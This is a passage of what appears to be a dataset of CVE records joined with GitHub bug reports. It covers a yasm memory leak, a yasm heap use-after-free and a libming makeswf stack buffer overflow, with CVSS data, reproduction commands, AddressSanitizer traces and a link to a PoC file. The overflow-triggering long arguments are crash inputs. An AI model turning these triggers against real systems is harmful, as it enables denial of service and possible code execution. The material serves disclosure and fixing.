cve_id stringlengths 13 16 | cve_published stringdate 2019-01-01 16:29:00 2025-02-25 20:15:37 | cve_descriptions stringlengths 34 2.6k | cve_metrics dict | cve_references listlengths 1 281 | cve_configurations listlengths 1 70 | cve_cwe_list listlengths 1 1 | cve_primary_cwe stringclasses 164 values | url stringlengths 36 97 | cve_tags listlengths 1 5 ⌀ | domain stringclasses 1 value | issue_owner_repo listlengths 2 2 | issue_body stringlengths 0 198k ⌀ | issue_title stringlengths 1 335 | issue_comments_url stringlengths 55 116 | issue_comments_count int64 0 338 | issue_created_at stringdate 2012-06-06 09:34:24 2025-04-02 09:37:20 | issue_updated_at stringdate 2014-04-01 20:16:21 2025-06-16 12:26:58 | issue_html_url stringlengths 36 97 | issue_github_id int64 4.93M 2.97B | issue_number int64 1 199k | __index_level_0__ int64 0 6.55k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
CVE-2023-31975 | 2023-05-09T13:15:18.590 | yasm v1.3.0 was discovered to contain a memory leak via the function yasm_intnum_copy at /libyasm/intnum.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 1.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/20/6"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/10"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/13"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/2"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/5"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/7"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/8"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/9"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/22/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/22/3"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/22/6"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/2"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/4"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/8"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/9"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/24/1"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/210"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/20/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/10"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/13"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/21/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/22/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/22/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/22/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/4"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/23/9"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://www.openwall.com/lists/oss-security/2023/06/24/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/210"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6556F7-3880-452A-ABA9-1A8A14BA41F3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/yasm/yasm/issues/210 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] |
I found a memory leak bug in yasm.
Please confirm.
Thanks!
### Test Environment
Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master)
### How to trigger
Compile the program with AddressSanitizer
Run command
$ touch u
$ ./yasm -ium u
### Details
ASAN report
$./yasm -ium u
```
yasm: file name already has no extension: output will be in `yasm.out'
=================================================================
==973537==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 16 byte(s) in 1 object(s) allocated from:
#0 0x499c1d in __interceptor_malloc (/home/root/randomFuzz/yasm/yasm/yasm_a_l_e/yasm+0x499c1d)
#1 0x53d0af in def_xmalloc /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/xmalloc.c:69:14
#2 0x511025 in yasm_intnum_copy /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/intnum.c:397:22
#3 0x638eb4 in group_assign_vstart_recurse /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/objfmts/bin/bin-objfmt.c:424:30
#4 0x632759 in bin_objfmt_output /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/objfmts/bin/bin-objfmt.c:1334:9
#5 0x4d07a2 in do_assemble /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:546:5
#6 0x4ccce0 in main /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:749:12
#7 0x7f1562a88082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
Direct leak of 16 byte(s) in 1 object(s) allocated from:
#0 0x499c1d in __interceptor_malloc (/home/root/randomFuzz/yasm/yasm/yasm_a_l_e/yasm+0x499c1d)
#1 0x53d0af in def_xmalloc /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/xmalloc.c:69:14
#2 0x510522 in yasm_intnum_create_uint /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/intnum.c:310:25
#3 0x636694 in bin_lma_create_group /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/objfmts/bin/bin-objfmt.c:248:22
#4 0x51d0f2 in yasm_object_sections_traverse /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/section.c:544:22
#5 0x62fb9e in bin_objfmt_output /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/objfmts/bin/bin-objfmt.c:1147:9
#6 0x4d07a2 in do_assemble /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:546:5
#7 0x4ccce0 in main /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:749:12
#8 0x7f1562a88082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: 32 byte(s) leaked in 2 allocation(s).
```
| yasm memory leak | https://api.github.com/repos/yasm/yasm/issues/210/comments | 5 | 2023-03-01T02:27:11Z | 2024-03-22T11:43:38Z | https://github.com/yasm/yasm/issues/210 | 1,604,119,944 | 210 | 5,089 |
CVE-2023-31973 | 2023-05-09T14:15:13.737 | yasm v1.3.0 was discovered to contain a use after free via the function expand_mmac_params at /nasm/nasm-pp.c. Note: Multiple third parties dispute this as a bug and not a vulnerability according to the YASM security policy. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/207"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/207"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:tortall:yasm:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "1453CF78-5025-49BF-A1A6-C62F948B5735",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/yasm/yasm/issues/207 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] | I found a heap-use-after-free in yasm.
Please confirm.
Thanks!
Test Environment
Ubuntu 20.04, 64 bit yasm (version: v1.3.0 ;master)
How to trigger
Compile the program with AddressSanitizer
Run command $ ./yasm -w -W -M $PoC
Details
ASAN report
$./yasm -w -W -M $PoC
```
yasm: warning: unrecognized option `-W'
yasm: file name already has no extension: output will be in `yasm.out'
=================================================================
==973036==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000011c8 at pc 0x0000005b6499 bp 0x7ffc2b8cc4f0 sp 0x7ffc2b8cc4e8
READ of size 8 at 0x60e0000011c8 thread T0
#0 0x5b6498 in expand_mmac_params /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-pp.c:3871:33
#1 0x5b13b4 in pp_getline /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-pp.c:5070:21
#2 0x5a7c61 in nasm_preproc_get_included_file /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-preproc.c:263:16
#3 0x4ce053 in do_preproc_only /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:310:23
#4 0x4cca12 in main /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:724:16
#5 0x7fd75a0e2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
#6 0x41d46d in _start (/home/root/randomFuzz/yasm/yasm/yasm_w_W_M/yasm+0x41d46d)
0x60e0000011c8 is located 8 bytes inside of 160-byte region [0x60e0000011c0,0x60e000001260)
freed by thread T0 here:
#0 0x4999b2 in free (/home/root/randomFuzz/yasm/yasm/yasm_w_W_M/yasm+0x4999b2)
#1 0x53d597 in def_xfree /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/xmalloc.c:113:5
#2 0x5b381a in free_mmacro /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-pp.c:1163:5
#3 0x5b05e3 in pp_getline /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-pp.c:5002:25
#4 0x5a7c61 in nasm_preproc_get_included_file /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-preproc.c:263:16
#5 0x4ce053 in do_preproc_only /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:310:23
#6 0x4cca12 in main /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:724:16
#7 0x7fd75a0e2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
previously allocated by thread T0 here:
#0 0x499c1d in __interceptor_malloc (/home/root/randomFuzz/yasm/yasm/yasm_w_W_M/yasm+0x499c1d)
#1 0x53d0af in def_xmalloc /home/root/FuzzDateset/yasm/yasm-1.3.0/libyasm/xmalloc.c:69:14
#2 0x5c5744 in do_directive /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-pp.c:3204:24
#3 0x5b13c1 in pp_getline /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-pp.c:5075:13
#4 0x5a7c61 in nasm_preproc_get_included_file /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-preproc.c:263:16
#5 0x4ce053 in do_preproc_only /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:310:23
#6 0x4cca12 in main /home/root/FuzzDateset/yasm/yasm-1.3.0/frontends/yasm/yasm.c:724:16
#7 0x7fd75a0e2082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /home/root/FuzzDateset/yasm/yasm-1.3.0/modules/preprocs/nasm/nasm-pp.c:3871:33 in expand_mmac_params
Shadow bytes around the buggy address:
0x0c1c7fff81e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c7fff81f0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c1c7fff8200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c7fff8210: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00
0x0c1c7fff8220: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1c7fff8230: fa fa fa fa fa fa fa fa fd[fd]fd fd fd fd fd fd
0x0c1c7fff8240: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
0x0c1c7fff8250: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1c7fff8260: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x0c1c7fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1c7fff8280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==973036==ABORTING
```
The URL of PoC is [PoC](https://github.com/randomssr/PoCs/blob/main/yasm/132-UAF) | yasm heap use-after-free bug | https://api.github.com/repos/yasm/yasm/issues/207/comments | 1 | 2023-03-01T02:03:35Z | 2023-05-10T05:20:08Z | https://github.com/yasm/yasm/issues/207 | 1,604,096,378 | 207 | 5,090 |
CVE-2023-31976 | 2023-05-09T14:15:13.780 | libming v0.4.8 was discovered to contain a stack buffer overflow via the function makeswf_preprocess at /util/makeswf_utils.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/265"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/libming/libming/issues/265"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:libming:libming:0.4.8:*:*:*:*:*:*:*",
"matchCriteriaId": "DD92BC79-2548-4C6F-9BDD-26C12BDF68AC",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/libming/libming/issues/265 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"libming",
"libming"
] |
When the program input contains the option of "-D" or "-o" , the program will cause stack buffer overflow error.
Test Environment
Ubuntu 20.04, 64 bit libming (master ; commit [04aee52](https://github.com/libming/libming/commit/04aee52363688426eab74f5d6180c149654a6473))
How to trigger
Compile the program with AddressSanitizer
Run command $ touch aaa
$ ./makeswf -D iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii -o aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa
Details
ASAN report
```
$ ./makeswf -D iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii -o aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaa
Output file name: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Output compression level: 9
Output SWF version: 6
Preprocessing ../../aaa... =================================================================
==2497535==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd856fb8a0 at pc 0x00000043d930 bp 0x7ffd856fb370 sp 0x7ffd856fab08
WRITE of size 1291 at 0x7ffd856fb8a0 thread T0
#0 0x43d92f in __interceptor_vsprintf (/home/root/Dataset/libming/sourcecode/origin_asan/install/bin/makeswf+0x43d92f)
#1 0x43e913 in sprintf (/home/root/Dataset/libming/sourcecode/origin_asan/install/bin/makeswf+0x43e913)
#2 0x4d0fca in makeswf_preprocess /home/root/Dataset/libming/sourcecode/libming-ming-0_4_8/util/makeswf_utils.c:251:2
#3 0x4d0a33 in makeswf_compile_source /home/root/Dataset/libming/sourcecode/libming-ming-0_4_8/util/makeswf_utils.c:114:10
